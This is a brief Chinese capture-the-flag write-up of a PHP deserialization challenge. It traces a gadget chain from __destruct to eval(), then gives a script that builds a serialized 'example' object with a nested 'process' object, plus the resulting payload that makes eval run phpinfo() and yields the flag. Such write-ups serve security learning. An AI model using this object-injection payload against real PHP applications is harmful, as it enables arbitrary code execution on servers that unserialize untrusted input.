这道题的触发逻辑 __destruct() -> funnnn() -> handle–>close() -> eval($pid)
构造脚本
<?php
class process {
public $pid;
function close() {
eval($this->pid);
}
}
class example {
public $handle;
}
$a = new example();
$a->handle = new process();
$a->handle->pid = "phpinfo();";
echo serialize($a);
?>
Payload:O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:10:"phpinfo();";}}
得到flag
``